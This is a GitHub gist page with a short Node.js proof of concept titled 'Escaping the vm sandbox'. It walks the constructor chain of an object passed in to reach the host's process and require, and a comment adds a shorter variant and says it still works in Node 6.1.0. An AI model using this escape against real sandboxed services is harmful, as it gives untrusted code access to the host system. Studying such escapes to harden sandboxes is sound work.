/escape-vm.js
Created Aug 17, 2015
Escaping the vm sandbox
| "use strict"; | |
| const vm = require("vm"); | |
| const sandbox = { anObject: {} }; | |
| const whatIsThis = vm.runInNewContext(` | |
| const ForeignObject = anObject.constructor; | |
| const ForeignFunction = ForeignObject.constructor; | |
| const process = ForeignFunction("return process")(); | |
| const require = process.mainModule.require; | |
| require("fs"); | |
| `, sandbox); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This comment has been minimized.
NiXXeD commentedMay 13, 2016
•
edited
Technically you can also just do:
const ForeignFunction = this.constructor.constructor;since the context object itself is created in the context you want. You don't even need a foreign object.
Also, this still appears to be an issue in Node 6.1.0. Just tested this for a silly Hubot script we have.